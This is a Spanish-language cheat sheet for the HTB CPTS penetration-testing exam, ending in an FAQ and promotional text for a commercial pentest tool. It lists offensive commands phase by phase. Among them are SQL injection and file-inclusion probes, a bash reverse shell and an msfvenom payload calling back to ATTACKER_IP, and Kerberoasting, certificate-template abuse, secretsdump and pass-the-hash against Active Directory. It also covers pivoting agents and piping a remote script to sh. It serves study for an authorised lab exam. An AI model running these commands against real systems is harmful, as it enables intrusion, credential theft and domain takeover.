# Recopilación de información
La red CPTS es un entorno empresarial realista. Mapea toda la superficie externa e interna antes de tocar nada — una enumeración exhaustiva impulsa toda la cadena de ataque.
Escaneo de puertos y servicios
nmap -p- --min-rate=1000 -T4 TARGET -oN ports.txt
nmap -p OPEN_PORTS -sC -sV -oA detailed TARGET
Subdominios y OSINT
subfinder -d TARGET -silent | httpx -silent -title -tech-detect
curl -s 'https://crt.sh/?q=%.TARGET&output=json' | jq -r '.[].name_value' | sort -u
Descubrimiento de contenido web
ffuf -u http://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -e .php,.aspx,.txt -mc all -fc 404
ffuf -u http://TARGET -H "Host: FUZZ.TARGET" -w subdomains.txt -fs 0
Enumeración SMB y de dominio
netexec smb TARGET -u '' -p '' --shares
enum4linux-ng -A TARGET
# Análisis de vulnerabilidades
La CPTS espera una fase estructurada de análisis de vulnerabilidades: asocia cada servicio a sus debilidades conocidas antes de explotar, y documenta todo para el informe.
nuclei -u https://TARGET -t cves/ -t misconfiguration/ -severity medium,high,critical
nikto -h http://TARGET -C all
searchsploit SERVICE VERSION
curl -s "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-XXXX-XXXXX" | jq '.vulnerabilities[0].cve.metrics'
# Explotación Web
Las aplicaciones web son un punto de entrada frecuente en la CPTS. Inyección, subida de archivos, SSTI e inclusión abren la puerta a la red interna.
Inyección SQL
sqlmap -r request.txt --batch --level 5 --risk 3 --dbs
Template Injection (SSTI)
{{7*7}} ${7*7} #{7*7}
Inclusión de archivos
curl "http://TARGET/?page=php://filter/convert.base64-encode/resource=config"
Bypass de subida
cp shell.php shell.phar # probar .phtml, .php5, doble ext, magic bytes
# Shells y Payloads
Consigue un punto de entrada estable y luego actualiza a un shell interactivo completo para la fase interna.
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o s.exe
# Active Directory
Active Directory es el corazón del examen CPTS. Mapea las rutas de ataque con BloodHound, obtén credenciales, abusa de AD CS y pivota hasta Domain Admin.
bloodhound-python -d domain.local -u USER -p PASS -c All -ns DC_IP
impacket-GetUserSPNs domain.local/USER:PASS -dc-ip DC_IP -request
impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip DC_IP
certipy find -u USER@domain.local -p PASS -dc-ip DC_IP -vulnerable -stdout
certipy req -u USER@domain.local -p PASS -ca CA-NAME -template VulnTemplate -upn administrator@domain.local
impacket-secretsdump domain.local/ADMIN:PASS@DC_IP
evil-winrm -i TARGET -u USER -H NTLM_HASH
# Pivoting y Tunneling
La red CPTS está segmentada. Comprometerás un host en una subred y pivotarás más profundo — ligolo-ng y chisel son las herramientas de referencia.
Ligolo-ng (recomendado)
./proxy -selfcert # en Kali, luego: interface ip add 240.0.0.1/32 route
./agent -connect ATTACKER_IP:11601 -ignore-cert
Chisel y SSH
./chisel server -p 8080 --reverse # cliente: ./chisel client ATTACKER_IP:8080 R:socks
proxychains4 netexec smb 10.10.0.0/24
# Escalada de privilegios
La escalada local en hosts Linux y Windows reinyecta credenciales en el compromiso del dominio.
Linux
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
sudo -l ; find / -perm -4000 -type f 2>/dev/null
Windows
.\winPEASx64.exe ; whoami /priv
.\GodPotato.exe -cmd "cmd /c whoami"
# Informe
La CPTS se califica con un informe de nivel comercial — ahí está la mayoría de los puntos. Estructúralo profesionalmente y haz que cada hallazgo sea reproducible.
# Resumen ejecutivo → Cadena de ataque → Hallazgos (CVSS + pasos) → Resumen de remediación
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt # documenta las creds crackeadas
# Consejos del Examen CPTS
Estrategia para los 10 días de examen más el informe. Es en el informe donde los candidatos pierden más puntos.
❓ Preguntas frecuentes CPTS
El examen HTB CPTS es una evaluación 100% práctica de 10 días contra una red Active Directory corporativa realista, seguida de tiempo para redactar un informe de nivel comercial. Debes alcanzar un número requerido de flags Y entregar un informe profesional — el informe es obligatorio y tiene un peso importante.
Su enfoque difiere. La CPTS tiene un componente de Active Directory y encadenamiento mucho más amplio y realista, y un fuerte énfasis en el informe profesional; la OSCP incluye máquinas independientes y una ventana más corta de 23h45. Muchos consideran la CPTS más amplia y orientada a empresa; la OSCP sigue siendo la referencia histórica.
Sí. La CPTS se califica con un informe de nivel comercial, no solo con flags. Debe incluir un resumen ejecutivo, un relato de la cadena de ataque, y hallazgos con severidad, CVSS, hosts afectados, pasos para reproducir y remediación. HTB soporta oficialmente SysReptor, y las herramientas Markdown se importan limpiamente.
nmap, ffuf/feroxbuster, nuclei, BloodHound/SharpHound, impacket (GetUserSPNs, secretsdump, psexec), certipy (AD CS ESC1–ESC8), evil-winrm, NetExec/CrackMapExec, ligolo-ng o chisel para el pivoting, y hashcat. Informe con SysReptor o el informe con IA de Pentest Mindmap.
El job path "Penetration Tester" de HTB Academy tiene unas 250+ horas y cubre todo el temario de la CPTS. La mayoría de los candidatos necesitan de 2 a 5 meses según su experiencia previa, con un fuerte enfoque en Active Directory, pivoting e informe.
Sí — de forma intensiva. La red del examen CPTS es un entorno AD corporativo. Domina el análisis de rutas con BloodHound, Kerberoasting, AS-REP roasting, abuso de AD CS (certipy ESC1–ESC8), NTLM relay, DCSync y movimiento lateral hasta Domain Admin.
No. A diferencia de la OSCP clásica, la CPTS no se centra en la explotación manual de buffer overflow. Enfatiza cadenas de ataque empresariales realistas, explotación web y de Active Directory, pivoting e informe profesional.
ESC1 es una mala configuración de Active Directory Certificate Services donde una plantilla vulnerable permite la autenticación de cliente y deja que el solicitante proporcione el sujeto. Con certipy puedes solicitar un certificado como Domain Admin y obtener un TGT — una vía rápida hacia el compromiso del dominio, común en los AD modernos evaluados en la CPTS.
Resumen ejecutivo (no técnico), alcance de la evaluación, un relato de la cadena de ataque realista, hallazgos detallados (descripción, impacto, hosts afectados, vector CVSS v3.1, pasos para reproducir, remediación, referencias) y un resumen de remediación priorizado. Mantenlo de nivel comercial y reproducible.
Sí — como acelerador de preparación. El mapa mental gratuito organiza 12.020+ comandos por los dominios de la CPTS, el Espacio Pentest ofrece una plantilla de informe CPTS dedicada, y el AI Wizard genera un informe estilo CPTS de nivel comercial. Acelera el aprendizaje de la metodología — respeta siempre las reglas de tu examen.
📚 Recursos relacionados
- Cheatsheet Active Directory — De BloodHound a Domain Admin — el núcleo del examen CPTS
- Cheatsheet OSCP — El equivalente de OffSec — 150+ comandos para el examen OSCP
- Cheatsheet PNPT — El equivalente de TCM — OSINT, AD y el debrief en vivo de 15 min
- Cheatsheet Nmap — Referencia nmap completa para reconocimiento y escaneo de puertos
- Cheatsheet Escalada de privilegios Linux — 80+ técnicas de privesc para la fase interna
- Guía del informe de pentest — Estructura, plantilla y secciones requeridas para un informe de nivel comercial
- Cheatsheet Pentesting completa — 200+ comandos para web, red, Active Directory y privesc
Convierte tus hallazgos en un informe CPTS de nivel comercial. El AI Wizard tiene un formato CPTS dedicado con cadena de ataque y hallazgos CVSS.
Prepara tu CPTS con 12.020+ comandos
Esta cheatsheet es solo la superficie. Pentest Mindmap organiza 12.020+ comandos en 34 categorías con búsqueda instantánea, una plantilla de informe CPTS y un generador de informes con IA.
Empezar gratis →